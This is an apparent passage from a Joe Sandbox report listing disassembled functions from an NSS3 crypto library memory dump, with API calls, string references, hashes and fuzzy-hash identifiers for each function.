Part of subcall function 6D55FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D55FBB1

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,6D56AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6D56C9F5
PORT_ArenaAlloc_Util.NSS3(00000000,00000050,?,?,?,?,?,?,?,6D56AEB0,?,00000004,00000001,?,00000000,?), ref: 6D56CA0A
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,6D56AEB0,?,00000004,00000001), ref: 6D56CA33
SECOID_FindOIDByTag_Util.NSS3(00000019,?,?,?,?,?,?,?,?,?,?,?,?,6D56AEB0,?,00000004), ref: 6D56CA4D
SECITEM_CopyItem_Util.NSS3(00000001,?,00000000), ref: 6D56CA60
SEC_PKCS7DestroyContentInfo.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6D56AEB0,?,00000004), ref: 6D56CA6D
PR_Now.NSS3 ref: 6D56CAD6
PORT_ArenaMark_Util.NSS3(00000000), ref: 6D56CB23
PORT_ArenaAlloc_Util.NSS3(00000000,0000005C), ref: 6D56CB32
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001), ref: 6D56CB64
SECOID_SetAlgorithmID_Util.NSS3(00000000,?,00000001,00000000), ref: 6D56CBBB
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6D56CBD0
PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6D56CBF6
PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6D56CC18
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000001,00000000), ref: 6D56CC39
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D56CC5B

Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56116E

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6D56CC69
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6D56CC89

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Arena$Alloc_$CopyItem_$AlgorithmAllocateArena_EncodeFindInteger_Tag_Value$ContentCriticalDestroyEnterErrorFreeInfoInitLockMark_PoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1766420342-0
Opcode ID: caec16c9f7b371013b84ec79ae6a13377d0298d541aea0dc7e5ce25020ee094c
Instruction ID: 32a00272cf019e29194ba620fdd49f89b5730dc8eb9b9c0b91c19abed4e14517
Opcode Fuzzy Hash: caec16c9f7b371013b84ec79ae6a13377d0298d541aea0dc7e5ce25020ee094c
Instruction Fuzzy Hash: E4B1BEB5D043869FEF09CF64CD40BBA7BB0BF58308F014125E914A7661EB71E9A0CBA1

Function 6D5429A0 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 292COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,^jQm,00000001,00000000,?,6D516540,?,0000000D,00000000), ref: 6D542A39
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,^jQm,00000001,00000000,?,6D516540,?,0000000D,00000000), ref: 6D542A5B
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,^jQm,00000001,00000000,?,6D516540,?,0000000D), ref: 6D542A6F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jQm,00000001), ref: 6D542AAD
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,^jQm,00000001,00000000), ref: 6D542ACB
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jQm,00000001), ref: 6D542ADF
PR_Unlock.NSS3(?), ref: 6D542B38
PR_Unlock.NSS3(?), ref: 6D542B8B

Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07AD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07CD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07D6
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D48204A), ref: 6D4F07E4
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,6D48204A), ref: 6D4F0864
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D4F0880
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,6D48204A), ref: 6D4F08CB
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08D7
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08FB

PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,^jQm,00000001,00000000,?,6D516540,?,0000000D,00000000,?), ref: 6D542CA2

Strings

@eQm, xrefs: 6D542A18, 6D542A22
^jQm, xrefs: 6D5429A5
@eQm, xrefs: 6D5429E7, 6D542A1D

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSectioncalloc$ErrorImportK11_Public
String ID: @eQm$@eQm$^jQm
API String ID: 2580468248-1154946177
Opcode ID: 5fbda46116b4037d22db581dc7cbcf555f245448b5bf174c34e0ded4dcb60992
Instruction ID: 4063b7aa670e5a982f059adad2771811ed047e0a2b7194b00d85379347fa3122
Opcode Fuzzy Hash: 5fbda46116b4037d22db581dc7cbcf555f245448b5bf174c34e0ded4dcb60992
Instruction Fuzzy Hash: 9CB1F175C00225AFDB25DF69DD84BAAB7B4FF49304F05C929DD46A3A11EB31E840CB92

Function 6D544C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6D544C4C
EnterCriticalSection.KERNEL32(?), ref: 6D544C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6D544CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6D544CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6D544CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D544D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D544D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6D544DB7

Part of subcall function 6D5ADD70: TlsGetValue.KERNEL32 ref: 6D5ADD8C
Part of subcall function 6D5ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADDB4

Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07AD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07CD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07D6
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D48204A), ref: 6D4F07E4
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,6D48204A), ref: 6D4F0864
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D4F0880
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,6D48204A), ref: 6D4F08CB
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08D7
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08FB

TlsGetValue.KERNEL32 ref: 6D544DD7
EnterCriticalSection.KERNEL32(?), ref: 6D544DEC
PR_Unlock.NSS3(?), ref: 6D544E1B
PR_SetError.NSS3(00000000,00000000), ref: 6D544E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D544E5A
PR_SetError.NSS3(00000000,00000000), ref: 6D544E71
free.MOZGLUE(00000000), ref: 6D544E7A
PR_Unlock.NSS3(?), ref: 6D544EA2
TlsGetValue.KERNEL32 ref: 6D544EC1
EnterCriticalSection.KERNEL32(?), ref: 6D544ED6
PR_Unlock.NSS3(?), ref: 6D544F01
free.MOZGLUE(00000000), ref: 6D544F2A

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: f5ebdcd24fad5f34af33ff5d47afafb10e9e1d383c519ef9ef26415a07b10c2c
Instruction ID: eac102d7f7fbcbb544314a79d36f182ad643ce92c645f2d5026bc05ea735f1bc
Opcode Fuzzy Hash: f5ebdcd24fad5f34af33ff5d47afafb10e9e1d383c519ef9ef26415a07b10c2c
Instruction Fuzzy Hash: 6CB132759442069FEF08DF69D884BAA77B4BF49318F058828ED0597B01EB70E960CBD3

Function 6D596E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6D596BF7), ref: 6D596EB6

Part of subcall function 6D4F1240: TlsGetValue.KERNEL32(00000040,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F1267
Part of subcall function 6D4F1240: EnterCriticalSection.KERNEL32(?,?,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F127C
Part of subcall function 6D4F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F1291
Part of subcall function 6D4F1240: PR_Unlock.NSS3(?,?,?,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F12A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6D63FC0A,6D596BF7), ref: 6D596ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6D596EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6D596EFC
PR_NewLock.NSS3 ref: 6D596F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D596F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6D596BF7), ref: 6D596F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6D596BF7), ref: 6D596F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6D596BF7), ref: 6D596FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6D596BF7), ref: 6D596FFD

Strings

# SSL/TLS secrets log file, generated by NSS, xrefs: 6D596EF7
SSLKEYLOGFILE, xrefs: 6D596EB1
NSS_SSL_CBC_RANDOM_IV, xrefs: 6D596FF8
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6D596F4F
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6D596FDB
SSLFORCELOCKS, xrefs: 6D596F2B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: a3f799f1c9d414f0a5fd3c44fd6c71ade6c69106bbb801bf7c6a4746f7f49869
Instruction ID: 0db89f80d9d71e683ce7db6e570357f3d7993cbb3ccb154d5ed9bb0f0033f088
Opcode Fuzzy Hash: a3f799f1c9d414f0a5fd3c44fd6c71ade6c69106bbb801bf7c6a4746f7f49869
Instruction Fuzzy Hash: 3AA15972D689C187EB19863ECD0036432A1BB93366F28CB76F9318FED9D77594048382

Function 6D515DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D515DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6D515E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6D515E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6D515E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6D515EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6D515ED9
SECKEY_SignatureLen.NSS3(?), ref: 6D515F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6D515F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6D515F89
free.MOZGLUE(?), ref: 6D515FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D515FB6
free.MOZGLUE(00000000), ref: 6D515FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6D51600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6D516079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D516084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D516094

Strings

, xrefs: 6D515EEB

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: 3890d11e97a847a8df2d7161f4726e212515d140aebf422c530ffce75e6d9602
Instruction ID: 6d01e17bbd0cbb2404b906d8ca655c42354ba1fa1bb43f81204f6c865ea04ee2
Opcode Fuzzy Hash: 3890d11e97a847a8df2d7161f4726e212515d140aebf422c530ffce75e6d9602
Instruction Fuzzy Hash: D38103B1E082069BFB18CE64CC81B7E77B5AF45314F054968E919A7B91E731ED10CBE2

Function 6D532F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6D532F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D532F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D532F63

Part of subcall function 6D61D930: PL_strncpyz.NSS3(?,?,?), ref: 6D61D963

PR_LogPrint.NSS3(?,00000000), ref: 6D532F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6D532F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6D532FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6D532FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6D532FE7

Strings

(CK_INVALID_HANDLE), xrefs: 6D532F5C
ulOldLen = %d, xrefs: 6D532FB0
hSession = 0x%x, xrefs: 6D532F3E, 6D532F4E
C_SetPIN, xrefs: 6D532F21
pOldPin = 0x%p, xrefs: 6D532F95
nam, xrefs: 6D532FFF, 6D533030
pNewPin = 0x%p, xrefs: 6D532FC9
ulNewLen = %d, xrefs: 6D532FE2

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$nam
API String ID: 1003633598-2670342409
Opcode ID: 106b9de1eeb4ad7ef1d5a07690bf5235780831fc76c56695c437562ff94a5a1e
Instruction ID: 97bb123c176e97b76a2157d93239c049fe96cf45f151240fcb7f0dbafa774a8b
Opcode Fuzzy Hash: 106b9de1eeb4ad7ef1d5a07690bf5235780831fc76c56695c437562ff94a5a1e
Instruction Fuzzy Hash: 27311735808154EFDB15DF5ADC45F2A77B5EB9E359F064024F608A7212EB309854CBE2

Function 6D619C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6D619C70
PR_NewLock.NSS3 ref: 6D619C85

Part of subcall function 6D5C98D0: calloc.MOZGLUE(00000001,00000084,6D4F0936,00000001,?,6D4F102C), ref: 6D5C98E5

PR_NewCondVar.NSS3(00000000), ref: 6D619C96

Part of subcall function 6D4EBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6D4F21BC), ref: 6D4EBB8C

PR_NewLock.NSS3 ref: 6D619CA9

Part of subcall function 6D5C98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6D5C9946
Part of subcall function 6D5C98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D4816B7,00000000), ref: 6D5C994E
Part of subcall function 6D5C98D0: free.MOZGLUE(00000000), ref: 6D5C995E

PR_NewLock.NSS3 ref: 6D619CB9
PR_NewLock.NSS3 ref: 6D619CC9
PR_NewCondVar.NSS3(00000000), ref: 6D619CDA

Part of subcall function 6D4EBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6D4EBBEB
Part of subcall function 6D4EBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6D4EBBFB
Part of subcall function 6D4EBB80: GetLastError.KERNEL32 ref: 6D4EBC03
Part of subcall function 6D4EBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6D4EBC19
Part of subcall function 6D4EBB80: free.MOZGLUE(00000000), ref: 6D4EBC22

PR_NewCondVar.NSS3(?), ref: 6D619CF0
PR_NewPollableEvent.NSS3 ref: 6D619D03

Part of subcall function 6D60F3B0: PR_CallOnce.NSS3(6D6614B0,6D60F510), ref: 6D60F3E6
Part of subcall function 6D60F3B0: PR_CreateIOLayerStub.NSS3(6D66006C), ref: 6D60F402
Part of subcall function 6D60F3B0: PR_Malloc.NSS3(00000004), ref: 6D60F416
Part of subcall function 6D60F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6D60F42D
Part of subcall function 6D60F3B0: PR_SetSocketOption.NSS3(?), ref: 6D60F455
Part of subcall function 6D60F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6D60F473

Part of subcall function 6D5C9890: TlsGetValue.KERNEL32(?,?,?,6D5C97EB), ref: 6D5C989E

EnterCriticalSection.KERNEL32(?), ref: 6D619D78
calloc.MOZGLUE(00000001,0000000C), ref: 6D619DAF
_PR_CreateThread.NSS3(00000000,6D619EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6D619D9F

Part of subcall function 6D4EB3C0: TlsGetValue.KERNEL32 ref: 6D4EB403
Part of subcall function 6D4EB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6D4EB459

_PR_CreateThread.NSS3(00000000,6D61A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6D619DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6D619DFC
_PR_CreateThread.NSS3(00000000,6D61A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6D619E29
calloc.MOZGLUE(00000001,0000000C), ref: 6D619E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6D619E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6D619E89

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 79a21041f092780d4ee9567d3ab7f8dcc8927abefd36137c4fa564efd5e83658
Instruction ID: 6983204fd635d4b9c8c96eba688b085394ae14be9cedd0c4d6bbc51424a298d7
Opcode Fuzzy Hash: 79a21041f092780d4ee9567d3ab7f8dcc8927abefd36137c4fa564efd5e83658
Instruction Fuzzy Hash: 7A6149B1904706AFD715CF79CC44A67BBE8FF48209B05452AE95AC7B11E730E950CBE1

Function 6D513FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

SECKEY_CopyPublicKey.NSS3(?), ref: 6D514014

Part of subcall function 6D5139F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6D515E6F,?), ref: 6D513A08
Part of subcall function 6D5139F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6D515E6F), ref: 6D513A1C
Part of subcall function 6D5139F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D513A3C

PORT_NewArena_Util.NSS3(00000800), ref: 6D514038

Part of subcall function 6D560FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
Part of subcall function 6D560FF0: PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016
Part of subcall function 6D560FF0: PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6D51404D

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6D62A0F4), ref: 6D5140C2

Part of subcall function 6D55F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6D55F0C8
Part of subcall function 6D55F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D55F122

SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6D51409A

Part of subcall function 6D55BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6D50E708,00000000,00000000,00000004,00000000), ref: 6D55BE6A
Part of subcall function 6D55BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6D5104DC,?), ref: 6D55BE7E
Part of subcall function 6D55BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6D55BEC2

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D5140DE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6D5140F4
PR_SetError.NSS3(FFFFE013,00000000), ref: 6D514108
SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6D51411A
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6D514137
SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6D514150
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6D62A1C8), ref: 6D51417E
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6D514194
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6D5141A7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D5141B2
PK11_DestroyObject.NSS3(?,?), ref: 6D5141D9
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D5141FC
